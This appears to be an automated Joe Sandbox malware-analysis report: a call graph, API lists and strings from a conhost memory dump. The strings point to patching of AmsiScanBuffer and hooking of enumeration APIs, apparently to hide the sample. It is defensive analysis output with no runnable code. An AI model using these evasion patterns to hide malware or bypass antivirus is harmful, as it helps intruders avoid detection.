2bcd7e3993c 9333->9346 9336 2bcd7e39324 _CreateFrameInfo 9 API calls 9337 2bcd7e3ae11 __CxxCallCatchBlock 9336->9337 9338 2bcd7e39978 __CxxCallCatchBlock 9 API calls 9337->9338 9342 2bcd7e3aec2 9338->9342 9339 2bcd7e3aeeb __CxxCallCatchBlock 9340 2bcd7e39324 _CreateFrameInfo 9 API calls 9339->9340 9341 2bcd7e3aefe 9340->9341 9343 2bcd7e39324 _CreateFrameInfo 9 API calls 9341->9343 9342->9339 9344 2bcd7e38ff8 __CxxCallCatchBlock 9 API calls 9342->9344 9345 2bcd7e3af07 9343->9345 9344->9339 9347 2bcd7e39324 _CreateFrameInfo 9 API calls 9346->9347 9348 2bcd7e3994d 9347->9348 9349 2bcd7e39958 9348->9349 9350 2bcd7e39324 _CreateFrameInfo 9 API calls 9348->9350 9351 2bcd7e39324 _CreateFrameInfo 9 API calls 9349->9351 9350->9349 9352 2bcd7e39969 9351->9352 9352->9336 9352->9337 7470 2bcd7e31bc4 7477 2bcd7e31724 GetProcessHeap HeapAlloc 7470->7477 7472 2bcd7e31bd3 7473 2bcd7e31bda SleepEx 7472->7473 7476 2bcd7e3159c StrCmpIW StrCmpW 7472->7476 7528 2bcd7e319b0 7472->7528 7474 2bcd7e31724 50 API calls 7473->7474 7474->7472 7476->7472 7545 2bcd7e31264 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 7477->7545 7479 2bcd7e3174c 7546 2bcd7e31000 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 7479->7546 7481 2bcd7e31754 7547 2bcd7e31264 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 7481->7547 7483 2bcd7e3175d 7548 2bcd7e31264 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 7483->7548 7485 2bcd7e31766 7549 2bcd7e31264 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 7485->7549 7487 2bcd7e3176f 7550 2bcd7e31000 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 7487->7550 7489 2bcd7e31778 7551 2bcd7e31000 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 7489->7551 7491 2bcd7e31781 7552 2bcd7e31000 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 7491->7552 7493 2bcd7e3178a RegOpenKeyExW 7494 2bcd7e317bc RegOpenKeyExW 7493->7494 7495 2bcd7e319a2 7493->7495 7496 2bcd7e317e5 7494->7496 7497 2bcd7e317fb RegOpenKeyExW 7494->7497 7495->7472 7553 2bcd7e312b8 RegQueryInfoKeyW 7496->7553 7499 2bcd7e3181f 7497->7499 7500 2bcd7e31836 RegOpenKeyExW 7497->7500 7562 2bcd7e3104c RegQueryInfoKeyW 7499->7562 7503 2bcd7e31871 RegOpenKeyExW 7500->7503 7504 2bcd7e3185a 7500->7504 7505 2bcd7e318ac RegOpenKeyExW 7503->7505 7506 2bcd7e31895 7503->7506 7508 2bcd7e312b8 16 API calls 7504->7508 7510 2bcd7e318d0 7505->7510 7511 2bcd7e318e7 RegOpenKeyExW 7505->7511 7509 2bcd7e312b8 16 API calls 7506->7509 7512 2bcd7e31867 RegCloseKey 7508->7512 7513 2bcd7e318a2 RegCloseKey 7509->7513 7514 2bcd7e312b8 16 API calls 7510->7514 7515 2bcd7e31922 RegOpenKeyExW 7511->7515 7516 2bcd7e3190b 7511->7516 7512->7503 7513->7505 7517 2bcd7e318dd RegCloseKey 7514->7517 7519 2bcd7e3195d RegOpenKeyExW 7515->7519 7520 2bcd7e31946 7515->7520 7518 2bcd7e3104c 6 API calls 7516->7518 7517->7511 7523 2bcd7e31918 RegCloseKey 7518->7523 7521 2bcd7e31981 7519->7521 7522 2bcd7e31998 RegCloseKey 7519->7522 7524 2bcd7e3104c 6 API calls 7520->7524 7525 2bcd7e3104c 6 API calls 7521->7525 7522->7495 7523->7515 7526 2bcd7e31953 RegCloseKey 7524->7526 7527 2bcd7e3198e RegCloseKey 7525->7527 7526->7519 7527->7522 7572 2bcd7e314a0 7528->7572 7545->7479 7546->7481 7547->7483 7548->7485 7549->7487 7550->7489 7551->7491 7552->7493 7554 2bcd7e31323 GetProcessHeap HeapAlloc 7553->7554 7555 2bcd7e31486 RegCloseKey 7553->7555 7556 2bcd7e3134e RegEnumValueW 7554->7556 7557 2bcd7e31472 GetProcessHeap HeapFree 7554->7557 7555->7497 7558 2bcd7e313a1 7556->7558 7557->7555 7558->7556 7558->7557 7560 2bcd7e313cf GetProcessHeap HeapAlloc GetProcessHeap HeapFree 7558->7560 7561 2bcd7e3141a lstrlenW GetProcessHeap HeapAlloc StrCpyW 7558->7561 7567 2bcd7e31530 7558->7567 7560->7561 7561->7558 7563 2bcd7e311b5 RegCloseKey 7562->7563 7565 2bcd7e310bf 7562->7565 7563->7500 7564 2bcd7e310cf RegEnumValueW 7564->7565 7565->7563 7565->7564 7566 2bcd7e3114e GetProcessHeap HeapAlloc GetProcessHeap HeapFree 7565->7566 7566->7565 7568 2bcd7e3154a 7567->7568 7571 2bcd7e31580 7567->7571 7569 2bcd7e31561 StrCmpIW 7568->7569 7570 2bcd7e31569 StrCmpW 7568->7570 7568->7571 7569->7568 7570->7568 7571->7558 7573 2bcd7e314e2 GetProcessHeap HeapFree GetProcessHeap HeapFree 7572->7573 7574 2bcd7e314c2 GetProcessHeap HeapFree 7572->7574 7574->7573 7574->7574 9147 2bcd7e419d0 9148 2bcd7e3e864 56 API calls 9147->9148 9149 2bcd7e419d9 9148->9149 8549 2bcd7e3824c 8551 2bcd7e38270 __scrt_release_startup_lock 8549->8551 8550 2bcd7e3b581 8551->8550 8552 2bcd7e3cb10 __std_exception_copy 13 API calls 8551->8552 8553 2bcd7e3b5aa 8552->8553 9150 2bcd7e35fcc 9151 2bcd7e35fd3 9150->9151 9152 2bcd7e36000 VirtualProtect 9151->9152 9154 2bcd7e35f10 9151->9154 9153 2bcd7e36029 GetLastError 9152->9153 9152->9154 9153->9154 9353 2bcd7e4494f 9354 2bcd7e4495e 9353->9354 9356 2bcd7e44968 9353->9356 9357 2bcd7e3c5ac LeaveCriticalSection 9354->9357 8554 2bcd7e3d658 8555 2bcd7e3d67d 8554->8555 8559 2bcd7e3d694 8554->8559 8556 2bcd7e3d1f4 __std_exception_copy 13 API calls 8555->8556 8558 2bcd7e3d682 8556->8558 8557 2bcd7e3d724 8686 2bcd7e3bb54 8557->8686 8560 2bcd7e3d04c _invalid_parameter_noinfo 38 API calls 8558->8560 8559->8557 8579 2bcd7e3d7b6 8559->8579 8581 2bcd7e3d6da 8559->8581 8587 2bcd7e3d894 8559->8587 8649 2bcd7e3da18 8559->8649 8577 2bcd7e3d68d 8560->8577 8564 2bcd7e3d784 8567 2bcd7e3d2a0 __free_lconv_num 13 API calls 8564->8567 8566 2bcd7e3d836 8568 2bcd7e3d2a0 __free_lconv_num 13 API calls 8566->8568 8569 2bcd7e3d78b 8567->8569 8572 2bcd7e3d841 8568->8572 8570 2bcd7e3d6fd 8569->8570 8576 2bcd7e3d2a0 __free_lconv_num 13 API calls 8569->8576 8571 2bcd7e3d2a0 __free_lconv_num 13 API calls 8570->8571 8571->8577 8573 2bcd7e3d85a 8572->8573 8578 2bcd7e3d2a0 __free_lconv_num 13 API calls 8572->8578 8580 2bcd7e3d2a0 __free_lconv_num 13 API calls 8573->8580 8574 2bcd7e3d2a0 __free_lconv_num 13 API calls 8574->8579 8575 2bcd7e3d2a0 __free_lconv_num 13 API calls 8575->8581 8576->8569 8578->8572 8579->8570 8579->8574 8580->8577 8581->8570 8581->8575 8583 2bcd7e3d87c 8585 2bcd7e3d06c _invalid_parameter_noinfo 17 API calls 8583->8585 8584 2bcd7e3d7d7 8584->8566 8584->8583 8692 2bcd7e40eb8 8584->8692 8586 2bcd7e3d891 8585->8586 8588 2bcd7e3d8c2 8587->8588 8588->8588 8589 2bcd7e3d8de 8588->8589 8590 2bcd7e3d220 __std_exception_copy 13 API calls 8588->8590 8589->8559 8591 2bcd7e3d90d 8590->8591 8592 2bcd7e3d926 8591->8592 8593 2bcd7e40eb8 38 API calls 8591->8593 8594 2bcd7e40eb8 38 API calls 8592->8594 8596 2bcd7e3d9fc 8592->8596 8593->8592 8595 2bcd7e3d943 8594->8595 8595->8596 8598 2bcd7e3d97f 8595->8598 8599 2bcd7e3d962 8595->8599 8600 2bcd7e3d98d 8595->8600 8597 2bcd7e3d06c _invalid_parameter_noinfo 17 API calls 8596->8597 8610 2bcd7e3da17 8597->8610 8602 2bcd7e3d2a0 __free_lconv_num 13 API calls 8598->8602 8601 2bcd7e3d220 __std_exception_copy 13 API calls 8599->8601 8603 2bcd7e3d977 8600->8603 8701 2bcd7e3eee0 8600->8701 8604 2bcd7e3d96d 8601->8604 8602->8596 8603->8598 8607 2bcd7e3d2a0 __free_lconv_num 13 API calls 8603->8607 8608 2bcd7e3d2a0 __free_lconv_num 13 API calls 8604->8608 8606 2bcd7e3da7a 8611 2bcd7e3da8c 8606->8611 8618 2bcd7e3daa1 8606->8618 8607->8598 8608->8603 8609 2bcd7e3d9b5 8612 2bcd7e3d9d0 8609->8612 8613 2bcd7e3d9ba 8609->8613 8610->8606 8710 2bcd7e413d8 8610->8710 8616 2bcd7e3d894 52 API calls 8611->8616 8615 2bcd7e3d2a0 __free_lconv_num 13 API calls 8612->8615 8617 2bcd7e3d2a0 __free_lconv_num 13 API calls 8613->8617 8615->8598 8644 2bcd7e3da9c 8616->8644 8617->8603 8620 2bcd7e3dd78 14 API calls 8618->8620 8619 2bcd7e38070 _invalid_parameter_noinfo 8 API calls 8621 2bcd7e3dd64 8619->8621 8622 2bcd7e3db0b 8620->8622 8621->8559 8623 2bcd7e3db1a 8622->8623 8719 2bcd7e3f198 8622->8719 8723 2bcd7e3d30c 8623->8723 8627 2bcd7e3dbd2 8630 2bcd7e3dd78 14 API calls 8627->8630 8633 2bcd7e3f198 9 API calls 8627->8633 8635 2bcd7e3d894 52 API calls 8627->8635 8636 2bcd7e3dcc8 FindNextFileW 8627->8636 8638 2bcd7e3d2a0 13 API calls __free_lconv_num 8627->8638 8639 2bcd7e3dd2a 8627->8639 8745 2bcd7e3d4ac 8627->8745 8628 2bcd7e3dba8 8629 2bcd7e3d894 52 API calls 8628->8629 8631 2bcd7e3dbb8 8629->8631 8630->8627 8632 2bcd7e3d2a0 __free_lconv_num 13 API calls 8631->8632 8631->8644 8632->8644 8633->8627 8635->8627 8636->8627 8637 2bcd7e3dce0 8636->8637 8640 2bcd7e3dd0c FindClose 8637->8640 8767 2bcd7e40b20 8637->8767 8638->8627 8641 2bcd7e3dd38 FindClose 8639->8641 8645 2bcd7e3d2a0 __free_lconv_num 13 API calls 8639->8645 8643 2bcd7e3dd1c 8640->8643 8640->8644 8641->8644 8646 2bcd7e3dd48 8641->8646 8647 2bcd7e3d2a0 __free_lconv_num 13 API calls 8643->8647 8644->8619 8645->8641 8648 2bcd7e3d2a0 __free_lconv_num 13 API calls 8646->8648 8647->8644 8648->8644 8650 2bcd7e3da58 8649->8650 8651 2bcd7e3da7a 8649->8651 8650->8651 8653 2bcd7e413d8 38 API calls 8650->8653 8652 2bcd7e3da8c 8651->8652 8656 2bcd7e3daa1 8651->8656 8654 2bcd7e3d894 56 API calls 8652->8654 8653->8650 8655 2bcd7e3da9c 8654->8655 8657 2bcd7e38070 _invalid_parameter_noinfo 8 API calls 8655->8657 8658 2bcd7e3dd78 14 API calls 8656->8658 8659 2bcd7e3dd64 8657->8659 8660 2bcd7e3db0b 8658->8660 8659->8559 8661 2bcd7e3f198 9 API calls 8660->8661 8662 2bcd7e3db1a 8660->8662 8661->8662 8663 2bcd7e3d30c 16 API calls 8662->8663 8664 2bcd7e3db7b FindFirstFileExW 8663->8664 8665 2bcd7e3dba8 8664->8665 8674 2bcd7e3dbd2 8664->8674 8666 2bcd7e3d894 56 API calls 8665->8666 8668 2bcd7e3dbb8 8666->8668 8667 2bcd7e3dd78 14 API calls 8667->8674 8668->8655 8669 2bcd7e3d2a0 __free_lconv_num 13 API calls 8668->8669 8669->8655 8670 2bcd7e3f198 9 API calls 8670->8674 8671 2bcd7e3d4ac 16 API calls 8671->8674 8672 2bcd7e3d894 56 API calls 8672->8674 8673 2bcd7e3dcc8 FindNextFileW 8673->8674 8675 2bcd7e3dce0 8673->8675 8674->8667 8674->8670 8674->8671 8674->8672 8674->8673 8676 2bcd7e3dd2a 8674->8676 8683 2bcd7e3d2a0 13 API calls __free_lconv_num 8674->8683 8677 2bcd7e3dd0c FindClose 8675->8677 8679 2bcd7e40b20 38 API calls 8675->8679 8678 2bcd7e3dd38 FindClose 8676->8678 8681 2bcd7e3d2a0 __free_lconv_num 13 API calls 8676->8681 8677->8655 8680 2bcd7e3dd1c 8677->8680 8678->8655 8682 2bcd7e3dd48 8678->8682 8679->8677 8684 2bcd7e3d2a0 __free_lconv_num 13 API calls 8680->8684 8681->8678 8685 2bcd7e3d2a0 __free_lconv_num 13 API calls 8682->8685 8683->8674 8684->8655 8685->8655 8687 2bcd7e3bb6c 8686->8687 8691 2bcd7e3bba4 8686->8691 8688 2bcd7e3d220 __std_exception_copy 13 API calls 8687->8688 8687->8691 8689 2bcd7e3bb9a 8688->8689 8690 2bcd7e3d2a0 __free_lconv_num 13 API calls 8689->8690 8690->8691 8691->8564 8691->8584 8696 2bcd7e40ed5 8692->8696 8693 2bcd7e40eda 8694 2bcd7e40ef0 8693->8694 8695 2bcd7e3d1f4 __std_exception_copy 13 API calls 8693->8695 8694->8584 8697 2bcd7e40ee4 8695->8697 8696->8693 8696->8694 8699 2bcd7e40f24 8696->8699 8698 2bcd7e3d04c _invalid_parameter_noinfo 38 API calls 8697->8698 8698->8694 8699->8694 8700 2bcd7e3d1f4 __std_exception_copy 13 API calls 8699->8700 8700->8697 8702 2bcd7e3ef02 8701->8702 8703 2bcd7e3ef1f 8701->8703 8702->8703 8704 2bcd7e3ef10 8702->8704 8705 2bcd7e3ef29 8703->8705 8775 2bcd7e419f0 8703->8775 8706 2bcd7e3d1f4 __std_exception_copy 13 API calls 8704->8706 8782 2bcd7e41a40 8705->8782 8709 2bcd7e3ef15 8706->8709 8709->8609 8711 2bcd7e413e0 8710->8711 8712 2bcd7e413f5 8711->8712 8714 2bcd7e4140e 8711->8714 8713 2bcd7e3d1f4 __std_exception_copy 13 API calls 8712->8713 8715 2bcd7e413fa 8713->8715 8717 2bcd7e3dd78 14 API calls 8714->8717 8718 2bcd7e41405 8714->8718 8716 2bcd7e3d04c _invalid_parameter_noinfo 38 API calls 8715->8716 8716->8718 8717->8718 8718->8610 8720 2bcd7e3f1ca 8719->8720 8721 2bcd7e3f1a9 8719->8721 8720->8623 8721->8720 8722 2bcd7e3ef88 9 API calls 8721->8722 8722->8720 8724 2bcd7e3d35a 8723->8724 8725 2bcd7e3d336 8723->8725 8726 2bcd7e3d3bf 8724->8726 8727 2bcd7e3d35f 8724->8727 8728 2bcd7e3d2a0 __free_lconv_num 13 API calls 8725->8728 8734 2bcd7e3d345 FindFirstFileExW 8725->8734 8729 2bcd7e3ec58 MultiByteToWideChar 8726->8729 8730 2bcd7e3d374 8727->8730 8731 2bcd7e3d2a0 __free_lconv_num 13 API calls 8727->8731 8727->8734 8728->8734 8737 2bcd7e3d3db 8729->8737 8732 2bcd7e3c5d0 14 API calls 8730->8732 8731->8730 8732->8734 8733 2bcd7e3d3e2 GetLastError 8794 2bcd7e3d184 8733->8794 8734->8627 8734->8628 8735 2bcd7e3d420 8735->8734 8739 2bcd7e3ec58 MultiByteToWideChar 8735->8739 8737->8733 8737->8735 8738 2bcd7e3d413 8737->8738 8741 2bcd7e3d2a0 __free_lconv_num 13 API calls 8737->8741 8742 2bcd7e3c5d0 14 API calls 8738->8742 8743 2bcd7e3d47a 8739->8743 8741->8738 8742->8735 8743->8733 8743->8734 8744 2bcd7e3d1f4 __std_exception_copy 13 API calls 8744->8734 8746 2bcd7e3d4fa 8745->8746 8747 2bcd7e3d4d6 8745->8747 8748 2bcd7e3d500 8746->8748 8749 2bcd7e3d55f 8746->8749 8751 2bcd7e3d2a0 __free_lconv_num 13 API calls 8747->8751 8753 2bcd7e3d4e5 8747->8753 8752 2bcd7e3d515 8748->8752 8748->8753 8754 2bcd7e3d2a0 __free_lconv_num 13 API calls 8748->8754 8750 2bcd7e3ece8 WideCharToMultiByte 8749->8750 8759 2bcd7e3d583 8750->8759 8751->8753 8755 2bcd7e3c5d0 14 API calls 8752->8755 8753->8627 8754->8752 8755->8753 8756 2bcd7e3d58a GetLastError 8757 2bcd7e3d184 13 API calls 8756->8757 8758 2bcd7e3d597 8757->8758 8761 2bcd7e3d1f4 __std_exception_copy 13 API calls 8758->8761 8759->8756 8762 2bcd7e3d2a0 __free_lconv_num 13 API calls 8759->8762 8765 2bcd7e3d5bb 8759->8765 8766 2bcd7e3d5c7 8759->8766 8760 2bcd7e3ece8 WideCharToMultiByte 8764 2bcd7e3d629 8760->8764 8761->8753 8762->8765 8763 2bcd7e3c5d0 14 API calls 8763->8766 8764->8753 8764->8756 8765->8763 8766->8753 8766->8760 8768 2bcd7e40b52 8767->8768 8769 2bcd7e3d1f4 __std_exception_copy 13 API calls 8768->8769 8774 2bcd7e40b67 8768->8774 8770 2bcd7e40b5c 8769->8770 8771 2bcd7e3d04c _invalid_parameter_noinfo 38 API calls 8770->8771 8771->8774 8772 2bcd7e38070 _invalid_parameter_noinfo 8 API calls 8773 2bcd7e40ea8 8772->8773 8773->8640 8774->8772 8776 2bcd7e41a12 HeapSize 8775->8776 8777 2bcd7e419f9 8775->8777 8778 2bcd7e3d1f4 __std_exception_copy 13 API calls 8777->8778 8779 2bcd7e419fe 8778->8779 8780 2bcd7e3d04c _invalid_parameter_noinfo 38 API calls 8779->8780 8781 2bcd7e41a09 8780->8781 8781->8705 8783 2bcd7e41a5f 8782->8783 8784 2bcd7e41a55 8782->8784 8786 2bcd7e41a64 8783->8786 8792 2bcd7e41a6b __std_exception_copy 8783->8792 8785 2bcd7e3c5d0 14 API calls 8784->8785 8790 2bcd7e41a5d 8785->8790 8787 2bcd7e3d2a0 __free_lconv_num 13 API calls 8786->8787 8787->8790 8788 2bcd7e41a71 8791 2bcd7e3d1f4 __std_exception_copy 13 API calls 8788->8791 8789 2bcd7e41a9e HeapReAlloc 8789->8790 8789->8792 8790->8709 8791->8790 8792->8788 8792->8789 8793 2bcd7e3b470 __std_exception_copy 2 API calls 8792->8793 8793->8792 8799 2bcd7e3d1d0 8794->8799 8796 2bcd7e3d191 __free_lconv_num 8797 2bcd7e3d1f4 __std_exception_copy 13 API calls 8796->8797 8798 2bcd7e3d1a1 8797->8798 8798->8744 8800 2bcd7e3cb10 __std_exception_copy 13 API calls 8799->8800 8801 2bcd7e3d1d9 8800->8801 8801->8796 9155 2bcd7e3c1d8 9156 2bcd7e3c1f1 9155->9156 9158 2bcd7e3c209 9155->9158 9157 2bcd7e3d2a0 __free_lconv_num 13 API calls 9156->9157 9156->9158 9157->9158 8802 2bcd7e32e54 8804 2bcd7e32ea8 8802->8804 8803 2bcd7e32ec3 8804->8803 8806 2bcd7e337f4 8804->8806 8807 2bcd7e3388a 8806->8807 8808 2bcd7e33819 8806->8808 8807->8803 8808->8807 8809 2bcd7e33f88 StrCmpNIW 8808->8809 8810 2bcd7e31e08 StrCmpIW StrCmpW 8808->8810 8809->8808 8810->8808 8169 2bcd7e3b0d4 8176 2bcd7e3b007 __CxxCallCatchBlock __FrameHandler3::GetHandlerSearchState 8169->8176 8170 2bcd7e3b0fb 8171 2bcd7e39324 _CreateFrameInfo 9 API calls 8170->8171 8172 2bcd7e3b100 8171->8172 8173 2bcd7e39324 _CreateFrameInfo 9 API calls 8172->8173 8175 2bcd7e3b10b __FrameHandler3::GetHandlerSearchState 8172->8175 8173->8175 8174 2bcd7e399cc 9 API calls Is_bad_exception_allowed 8174->8176 8176->8170 8176->8174 8176->8175 8178 2bcd7e399f4 8176->8178 8179 2bcd7e39324 _CreateFrameInfo 9 API calls 8178->8179 8180 2bcd7e39a02 8179->8180 8180->8176

                              Control-flow Graph

                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000014.00000002.3047668463.000002BCD7E31000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002BCD7E30000, based on PE: true
                              • Associated: 00000014.00000002.3046596422.000002BCD7E30000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000014.00000002.3048994464.000002BCD7E45000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000014.00000002.3049958100.000002BCD7E50000.00000004.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000014.00000002.3050745902.000002BCD7E52000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000014.00000002.3051444398.000002BCD7E59000.00000002.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_20_2_2bcd7e30000_conhost.jbxd
                              Similarity
                              • API ID: Alloc$Thread$AddressCreateCurrentHandleModuleProc
                              • String ID: AmsiScanBuffer$EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$PdhGetFormattedCounterArrayW$PdhGetRawCounterArrayW$advapi32.dll$amsi.dll$ntdll.dll$pdh.dll$sechost.dll
                              • API String ID: 1735320900-4225371247
                              • Opcode ID: 03b1670190296a985cca1de1054792f3360a7fe3fa664d1b18e69e842768ce50
                              • Instruction ID: d49f1f6c35ee5c24a4384594b15794368690be238f8a9cb26c282480109bd010
                              • Opcode Fuzzy Hash: 03b1670190296a985cca1de1054792f3360a7fe3fa664d1b18e69e842768ce50
                              • Instruction Fuzzy Hash: 94517978510A4BADEB14EB64EC49BD43324A74074AFA0553FD84983E75DF78C26AC383

                              Control-flow Graph

                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000014.00000002.3047668463.000002BCD7E31000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002BCD7E30000, based on PE: true
                              • Associated: 00000014.00000002.3046596422.000002BCD7E30000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000014.00000002.3048994464.000002BCD7E45000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000014.00000002.3049958100.000002BCD7E50000.00000004.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000014.00000002.3050745902.000002BCD7E52000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000014.00000002.3051444398.000002BCD7E59000.00000002.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_20_2_2bcd7e30000_conhost.jbxd
                              Similarity
                              • API ID: AddressLibraryLoadProcSleep
                              • String ID: AmsiScanBuffer$amsi.dll
                              • API String ID: 188063004-3248079830
                              • Opcode ID: 594064a6cd66e1c3961e71c37a52b1967edf4951384bf957dace5d3e1a2af7c1
                              • Instruction ID: 202e306d595dc7514faef03b027e8ea82594bb7e47ec9954c953192d7c6d2b0a
                              • Opcode Fuzzy Hash: 594064a6cd66e1c3961e71c37a52b1967edf4951384bf957dace5d3e1a2af7c1
                              • Instruction Fuzzy Hash: 3ED0623C611A02DEE9186B11DC5D35433616B64B49FE4153FC50A42FB0EF3DC569D342

                              Control-flow Graph

                              APIs
                              • GetModuleFileNameW.KERNEL32 ref: 000002BCD7E33A35
                              • PathFindFileNameW.SHLWAPI ref: 000002BCD7E33A44
                                • Part of subcall function 000002BCD7E33F88: StrCmpNIW.SHLWAPI(?,?,?,000002BCD7E3272F), ref: 000002BCD7E33FA0
                                • Part of subcall function 000002BCD7E33EC8: GetModuleHandleW.KERNEL32(?,?,?,?,?,000002BCD7E33A5B), ref: 000002BCD7E33EDB
                                • Part of subcall function 000002BCD7E33EC8: GetCurrentProcess.KERNEL32(?,?,?,?,?,000002BCD7E33A5B), ref: 000002BCD7E33F0E
                                • Part of subcall function 000002BCD7E33EC8: VirtualProtectEx.KERNEL32(?,?,?,?,?,000002BCD7E33A5B), ref: 000002BCD7E33F2E
                                • Part of subcall function 000002BCD7E33EC8: GetCurrentProcess.KERNEL32(?,?,?,?,?,000002BCD7E33A5B), ref: 000002BCD7E33F47
                                • Part of subcall function 000002BCD7E33EC8: VirtualProtectEx.KERNEL32(?,?,?,?,?,000002BCD7E33A5B), ref: 000002BCD7E33F68
                              • CreateThread.KERNELBASE ref: 000002BCD7E33A8B
                                • Part of subcall function 000002BCD7E31E74: GetCurrentThread.KERNEL32 ref: 000002BCD7E31E7F
                                • Part of subcall function 000002BCD7E31E74: CreateThread.KERNELBASE ref: 000002BCD7E32043
                                • Part of subcall function 000002BCD7E31E74: TlsAlloc.KERNEL32 ref: 000002BCD7E32049
                                • Part of subcall function 000002BCD7E31E74: TlsAlloc.KERNEL32 ref: 000002BCD7E32055
                                • Part of subcall function 000002BCD7E31E74: TlsAlloc.KERNEL32 ref: 000002BCD7E32061
                                • Part of subcall function 000002BCD7E31E74: TlsAlloc.KERNEL32 ref: 000002BCD7E3206D
                                • Part of subcall function 000002BCD7E31E74: TlsAlloc.KERNEL32 ref: 000002BCD7E32079
                                • Part of subcall function 000002BCD7E31E74: TlsAlloc.KERNEL32 ref: 000002BCD7E32085
                              Memory Dump Source
                              • Source File: 00000014.00000002.3047668463.000002BCD7E31000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002BCD7E30000, based on PE: true
                              • Associated: 00000014.00000002.3046596422.000002BCD7E30000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000014.00000002.3048994464.000002BCD7E45000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000014.00000002.3049958100.000002BCD7E50000.00000004.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000014.00000002.3050745902.000002BCD7E52000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000014.00000002.3051444398.000002BCD7E59000.00000002.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_20_2_2bcd7e30000_conhost.jbxd
                              Similarity
                              • API ID: Alloc$CurrentThread$CreateFileModuleNameProcessProtectVirtual$FindHandlePath
                              • String ID:
                              • API String ID: 2779030803-0
                              • Opcode ID: 6a579ca0c7c2c8c467e4d6158b23fada6777a03145598802ad2919fe2a24b2e1
                              • Instruction ID: c10e3cbf1c16fcdc61345c24cd5b44bfa7570812c901633fb8882c6b9ebd82a9
                              • Opcode Fuzzy Hash: 6a579ca0c7c2c8c467e4d6158b23fada6777a03145598802ad2919fe2a24b2e1
                              • Instruction Fuzzy Hash: 3411253DA106078AFB64A721A54DBA933A1A79434BFB0423F941681FE2EF79C458C642
                              APIs
                              Memory Dump Source
                              • Source File: 00000014.00000003.2594886169.000002BCD7E00000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BCD7E00000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_20_3_2bcd7e00000_conhost.jbxd
                              Similarity
                              • API ID: LibraryLoad
                              • String ID:
                              • API String ID: 1029625771-0
                              • Opcode ID: da5dba7eb06952aa6345e7caa7b696f440210d15dc911575dfa97e0e60fe5b6d
                              • Instruction ID: 6e0f5f452ddfa5f4a1e10f075f6bb66dac2a2bd06e936dcf9448c5faf1cac316
                              • Opcode Fuzzy Hash: da5dba7eb06952aa6345e7caa7b696f440210d15dc911575dfa97e0e60fe5b6d
                              • Instruction Fuzzy Hash: DA91167AB012528FDB648F29D40CB6DB391F758B98F64813E9E4917F89DB38D812C711

                              Control-flow Graph

                              APIs
                                • Part of subcall function 000002BCD7E31724: GetProcessHeap.KERNEL32 ref: 000002BCD7E3172F
                                • Part of subcall function 000002BCD7E31724: HeapAlloc.KERNEL32 ref: 000002BCD7E3173E
                                • Part of subcall function 000002BCD7E31724: RegOpenKeyExW.ADVAPI32 ref: 000002BCD7E317AE
                                • Part of subcall function 000002BCD7E31724: RegOpenKeyExW.ADVAPI32 ref: 000002BCD7E317DB
                                • Part of subcall function 000002BCD7E31724: RegCloseKey.ADVAPI32 ref: 000002BCD7E317F5
                                • Part of subcall function 000002BCD7E31724: RegOpenKeyExW.ADVAPI32 ref: 000002BCD7E31815
                                • Part of subcall function 000002BCD7E31724: RegCloseKey.ADVAPI32 ref: 000002BCD7E31830
                                • Part of subcall function 000002BCD7E31724: RegOpenKeyExW.ADVAPI32 ref: 000002BCD7E31850
                                • Part of subcall function 000002BCD7E31724: RegCloseKey.ADVAPI32 ref: 000002BCD7E3186B
                                • Part of subcall function 000002BCD7E31724: RegOpenKeyExW.ADVAPI32 ref: 000002BCD7E3188B
                                • Part of subcall function 000002BCD7E31724: RegCloseKey.ADVAPI32 ref: 000002BCD7E318A6
                                • Part of subcall function 000002BCD7E31724: RegOpenKeyExW.ADVAPI32 ref: 000002BCD7E318C6
                              • SleepEx.KERNELBASE ref: 000002BCD7E31BDF
                                • Part of subcall function 000002BCD7E31724: RegCloseKey.ADVAPI32 ref: 000002BCD7E318E1
                                • Part of subcall function 000002BCD7E31724: RegOpenKeyExW.ADVAPI32 ref: 000002BCD7E31901
                                • Part of subcall function 000002BCD7E31724: RegCloseKey.ADVAPI32 ref: 000002BCD7E3191C
                                • Part of subcall function 000002BCD7E31724: RegOpenKeyExW.ADVAPI32 ref: 000002BCD7E3193C
                                • Part of subcall function 000002BCD7E31724: RegCloseKey.ADVAPI32 ref: 000002BCD7E31957
                                • Part of subcall function 000002BCD7E31724: RegOpenKeyExW.ADVAPI32 ref: 000002BCD7E31977
                                • Part of subcall function 000002BCD7E31724: RegCloseKey.ADVAPI32 ref: 000002BCD7E31992
